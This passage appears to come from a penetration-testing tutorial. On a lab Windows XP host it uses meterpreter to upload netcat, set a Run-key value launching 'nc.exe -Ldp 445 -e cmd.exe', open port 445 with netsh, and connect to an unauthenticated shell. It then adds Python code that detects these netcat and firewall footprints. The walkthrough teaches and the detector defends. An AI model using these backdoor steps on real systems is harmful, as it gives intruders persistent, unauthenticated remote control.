In this example, instead of looking for information on the remote system, we will install a Netcat backdoor. This involves changes to the system registry and to the firewall.

First, we must upload a copy of Netcat to the remote system.
```
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
```
Afterwards, we work with the registry so that netcat is executed at start-up and listens on port 445. We do this by editing the key `HKLM\software\microsoft\windows\currentversion\run`.
```
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (3):

    VMware Tools
    VMware User Process
    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
```
Next, we need to alter the system to allow remote connections through the firewall to our Netcat backdoor. We open an interactive command prompt and use the netsh command to make the changes, as it is far less error-prone than altering the registry directly. Also, the process shown should work across more versions of Windows, because registry locations and functions are highly dependent on version and patch level.
```
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode
Netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
```
We open port 445 in the firewall and double-check that it was set properly.
```
C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
445    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

C:\Documents and Settings\Jim\My Documents >
```
With everything in place, we reboot the remote system and test the Netcat shell.
```
root@kali:~# nc -v 172.16.104.128 445
172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [172.16.104.128] 445 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim > dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E423-E726

 Directory of C:\Documents and Settings\Jim

05/03/2009  01:43 AM    <DIR>          .
05/03/2009  01:43 AM    <DIR>          ..
05/03/2009  01:26 AM                 0 ;i
05/12/2009  10:53 PM    <DIR>          Desktop
10/29/2008  05:55 PM    <DIR>          Favorites
05/12/2009  10:53 PM    <DIR>          My Documents
05/03/2009  01:43 AM                 0 QCY
10/29/2008  03:51 AM    <DIR>          Start Menu
05/03/2009  01:25 AM                 0 talltelnet.log
05/03/2009  01:25 AM                 0 talltftp.log
               4 File(s)              0 bytes
               6 Dir(s)  35,540,791,296 bytes free

C:\Documents and Settings\Jim >
```
In the real world, we would not use such a simple backdoor with no authentication or encryption, but the principles of this process remain the same for other changes to the system, and for other kinds of programs one might want to run at start-up.
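The two footprints this procedure leaves, a Run key value that starts a netcat listener and an extra firewall exception sitting beside the built-in "SMB over TCP" entry on the same port, are exactly what a defender can audit for. The following Python is an added example, not part of the original walkthrough, and works on constructed samples laid out like the registry dump and `netsh firewall show portopening` output above; the baseline exception names it treats as expected are an assumption taken from that listing.

```python
import re

# Constructed samples, not taken from a real host: the Run key's values and a
# "netsh firewall show portopening" listing in the layout the walkthrough shows.
RUN_KEY_VALUES = {
    "VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"',
    "nc": r"C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe",
}
PORTOPENING_OUTPUT = """\
Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
445    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
"""

NETCAT_BINARIES = {"nc.exe", "ncat.exe", "netcat.exe"}
# "-e <shell>" is what hands an accepted connection to a command interpreter.
SHELL_EXEC = re.compile(r"\s-e\s+\S*(cmd|powershell)", re.I)
FIRST_EXE = re.compile(r"([\w.-]+\.exe)", re.I)
PORT_LINE = re.compile(r"^\s*(\d+)\s+(TCP|UDP)\s+(\w+)\s+(.+?)\s*$")
# Exception names present before the change in the listing above (assumption).
BASELINE_NAMES = {"NetBIOS Session Service", "SMB over TCP",
                  "NetBIOS Name Service", "NetBIOS Datagram Service"}

def suspicious_run_values(values):
    """Return (name, command) pairs that launch a netcat-style listener."""
    hits = []
    for name, cmd in values.items():
        exe = FIRST_EXE.search(cmd)
        binary = exe.group(1).lower() if exe else ""
        if binary in NETCAT_BINARIES or SHELL_EXEC.search(cmd):
            hits.append((name, cmd))
    return hits

def parse_portopenings(text):
    """Parse the 'port protocol mode name' rows out of the netsh listing."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows

def suspicious_portopenings(rows):
    """Exceptions whose name is not one of the baseline entries."""
    return [(p, proto, name) for p, proto, _m, name in rows if name not in BASELINE_NAMES]

def duplicated_ports(rows):
    """(port, protocol) pairs listed more than once under different names."""
    names = {}
    for p, proto, _m, name in rows:
        names.setdefault((p, proto), set()).add(name)
    return {key for key, n in names.items() if len(n) > 1}
```

On a live host the same checks apply to the real Run key contents and the real `netsh` output; a port that is listed twice is the signature of an exception added on top of a built-in one.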